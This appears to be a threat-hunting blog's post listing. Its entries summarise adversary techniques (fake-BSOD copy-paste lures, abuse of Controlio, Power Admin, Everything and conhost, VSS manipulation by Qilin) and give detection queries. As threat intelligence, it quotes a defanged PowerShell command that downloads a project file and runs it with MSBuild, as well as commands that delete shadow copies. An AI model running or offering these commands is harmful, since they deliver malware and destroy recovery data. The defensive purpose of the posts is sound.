Posts

367. Adversaries Use Fake BSOD to Make a Victim to Run a Malicious Command

Image
Hello everyone! Why are phishing emails needed if victims can run a malicious command themselves? Yes, today we’re once again looking at an interesting variant of User Execution: Malicious Copy and Paste (T1204.004) . In fact, phishing emails were still involved: this time the attackers disguised themselves as Booking.com. The email contained a link leading to a phishing website. When the victim clicked the “Refresh page” button, the browser switched to full-screen mode and displayed a familiar instruction to copy and paste a malicious command - this time cleverly disguised as a Blue Screen of Death . As for the command itself, it was also quite interesting and included the use of Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001) : powershell -c “start hxxps[://admin.booking[.]com;$msb=(gci C:\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;iwr hxxps://2fa-bns[.]com/ -o $env:ProgramData\v.proj;& $msb $env:ProgramData\v.proj” Detection: Pay attention to file...
Post a Comment
Read more

366. Adversaries Started to Abuse Controlio

Image
Hello everyone! I promised you to keep posting and notify you on any interesting tactics, techniques and procedures. So, let's start the new year! Harlan Carvey (I'm sure you've read his books !) shared that adversaries started to use Controlio - a cloud-based employee monitoring and productivity analytics platform.  By the way, it's not the first time adversaries use similar tools. Another example is Rare Werewolf: the adversary leveraged  Mipko Employee Monitor. Look for suspicious communications for controlio[.]net: event_type: "dnsreqwin" AND dns_rname: "controlio.net" Look for suspicious executions of Controlio-related binaries: event_type: "processcreatewin" AND proc_file_productname: "controlio" Happy hunting!
Post a Comment
Read more

365. The Zeltser Challenge Completed

Image
Hello everyone! No, no more detection and hunting tips today! And yes, it's the last post for the Zeltser challenge! It was a definitely a hard one, but still it was fun! Thank you Dave for motivating me to start it! Thanks everyone who reacted to the posts and wrote kind words - it helped me a lot to finish it! It doesn't mean I stop posting! But I won't do it every day! Still, if I see something interesting - I share it with you! Thank you for reading the blog and see you next year!
Post a Comment
Read more

364. Another RMM in a Ransomware Affiliate's Toolkit

Image
Hello everyone! Today we'll look at another example of a very common technique - Remote Access Tools: Remote Desktop Software (T1219.002) . Ransomware gangs have lots of such tools in their arsenal. For example, Power Admin -  legitimate tool that provides functionality to monitor servers and applications, as well as file access auditing.  Of course, it may be a good target for detection and hunting, for example: event_type: "processcreatewin" AND proc_file_productname: "pa server monitor" See you tomorrow!
Post a Comment
Read more

363. That's How Arcane Werewolf Abuses Conhost

Image
Hello everyone! We often talk (and see, of course) LOLBAS. So, let's look at another one, which became really popular among adversaries this year. So, our today's example - Arcane Werewolf . The adversary leverages conhost.exe to run the dropper: conhost.exe C:\Users\<USER>\AppData\Local\Temp\icon2.png One more example - running Loki 2.0 loader: conhost.exe %TEMP%\chrome_proxy.pdf As you can see, the threat actors quite suspicious file exensions, so we can use it to build a query: event_type: "processcreatewin" AND proc_file_path: "conhost.exe" AND cmdline: (*png OR *pdf) See you tomorrow!
Post a Comment
Read more

362. Ransomware Gangs Use This Tool for Discovery

Image
Hello everyone! Today we'll talk about how ransomware gangs abuse legitimate software for  File and Directory Discovery (T1083) . And our example for today's post - NightSpire . Anong other tools, the gang leveraged Everything - a legitimate tool that enables an adversary to index files and get a deeper understanding of data available on the compromised system. So, this tool, especially if it's not widely used internaly, may be a good target for hunting: event_type: "processcreatewin" AND proc_file_originalfilename: "everything.exe" See you tomorrow!
Post a Comment
Read more

361. That's How Adversaries Manipulate Volume Shadow Copy Service

Image
Hello everyone! It's not a secret that ransomware gangs often interact with Volume Shadow Copy Service to  Inhibit System Recovery (T1490) . In most cases it's not a good target for hunting as adversaries abuse it on the latest stages of attack lifecycle. At the same time, they may use scripting to manipulate it, and it may be you last chance to detect malicious activity. For example, Qilin executed the following commands: cmd /C net start vss cmd /C wmic service where name='vss' call ChangeStartMode Manual cmd /C vssadmin.exe Delete Shadows /all /quiet cmd /C net stop vss cmd /C wmic service where name='vss' call ChangeStartMode Disabled I'm sure you have detections for deletion, but what about manipulating the service? So, it may be a good idea to look for abusing wmic.exe for VSS manipulation: event_type: "processcreatewin" AND proc_file_path: "wmic.exe" AND cmdline: "vss" See you tomorrow!
Post a Comment
Read more